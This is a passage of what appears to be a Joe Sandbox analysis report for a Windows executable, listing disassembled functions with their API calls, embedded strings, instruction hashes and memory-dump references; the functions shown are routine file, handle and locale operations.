                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-475419079
                                                                                                                                                                                                                                                                    • Opcode ID: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction ID: 607fb1377a63fdc9f035f0c432f6c8044d68b344f7ff51ac538f5213003713f8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0418D35781214A7C620AF6AAC47FEB7358EB81B25F1401BBFD09A32D0DD69AD0046ED
                                                                                                                                                                                                                                                                    Function 00412610 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004126EE
                                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00412707
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00412751
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004127EF
                                                                                                                                                                                                                                                                    • __Getwctype.LIBCPMT ref: 0041282A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$GetctypeGetwctypeLocinfo_ctorLocinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 201867346-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction ID: fb01a51910be7c6eaa99b540ff2eac30bca8d6a60054ec657d3f721683236568
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 525193B1C003589BEB10DFA5C945BDAB7B4BF14314F14826ED848E7341EB78EA94CB66
                                                                                                                                                                                                                                                                    Function 0041FA30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: All pipes closed properly.$CommBridge$Inside closeBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 528846559-1211123791
                                                                                                                                                                                                                                                                    • Opcode ID: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction ID: c28e8b6ec9cc632472ca235f45b3f8d0a108cff224a1436875239388707932b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421D330B40321A7CA20EF268C56F873B54AF12F11F240577B806A72D0CEACF99187AD
                                                                                                                                                                                                                                                                    Function 0048857A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00488689,0040B377,?,00000000,?,?,?,004888B3,00000022,FlsSetValue,004A3F04,004A3F0C,?), ref: 0048863B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction ID: 0d18bb84f8fc76a6c3da93e18ff47703567a800fd64ff94e1cc0b507c8cbf4c8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C21C331A01221ABCB21AB259C41A9F37589B51760F64096BE906B7390EF38ED00CBDD
                                                                                                                                                                                                                                                                    Function 00427260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(?), ref: 00427283
                                                                                                                                                                                                                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,?,?,0040653E), ref: 0042729D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DirectoryPath$CreateExistsFile
                                                                                                                                                                                                                                                                    • String ID: FileUtils$OOBEUtils$SHCreateDirectoryEx failed. Error: %d
                                                                                                                                                                                                                                                                    • API String ID: 3984196470-716391998
                                                                                                                                                                                                                                                                    • Opcode ID: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction ID: 1c360898109e8edf91c6b2f0d6b286c19c2d4d721b312238894a1274079c5597
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0119B3174522097CA249B55BD4AF4B3758AFC2F51B5504ABFC4557391CA68AC40CABC
                                                                                                                                                                                                                                                                    Function 004151D0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironment
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1096182194-0
                                                                                                                                                                                                                                                                    • Opcode ID: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction ID: 34402626d38a9728df7e9b11658db42f6f8f7e161e27eba0645d41ce3f5bf331
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D371B00B11EBDB209F76EC48B9777ECBF54B41304493AB956E3650EA78E8408A69
                                                                                                                                                                                                                                                                    Function 0041FB30 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FBA7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FC27
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
